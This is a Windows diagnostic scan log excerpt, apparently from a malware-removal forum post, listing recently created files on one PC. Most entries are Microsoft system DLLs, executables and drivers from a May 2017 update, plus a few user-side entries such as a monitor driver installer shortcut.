2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:03 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-05-09 21:39 - 2017-04-28 03:00 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-05-09 21:39 - 2017-04-28 02:59 - 05477088 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00388000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2017-05-09 21:39 - 2017-04-28 02:59 - 00207264 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2017-05-09 21:39 - 2017-04-28 02:59 - 00027040 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2017-05-09 21:39 - 2017-04-28 02:58 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-05-09 21:39 - 2017-04-28 02:58 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-05-09 21:39 - 2017-04-28 02:57 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-05-09 21:39 - 2017-04-28 02:56 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 21353200 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-05-09 21:39 - 2017-04-28 02:55 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-05-09 21:39 - 2017-04-28 02:53 - 00387928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 02957824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:52 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:52 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:51 - 20505600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:49 - 00072192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:49 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 19335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:46 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:45 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:44 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:42 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:41 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 11870208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:40 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 02:40 - 00328704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 02:40 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 03655680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-05-09 21:39 - 2017-04-28 02:39 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 02:38 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 02:37 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-05-09 21:39 - 2017-04-28 02:34 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-05-09 21:39 - 2017-04-28 02:33 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-05-09 21:39 - 2017-04-28 02:26 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-05-09 21:39 - 2017-04-28 02:15 - 03672064 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-05-09 21:39 - 2017-04-28 02:15 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-05-09 21:39 - 2017-04-28 02:14 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-05-09 21:39 - 2017-04-28 02:11 - 00082944 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2017-05-09 21:39 - 2017-04-28 02:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-05-09 21:39 - 2017-04-28 02:11 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
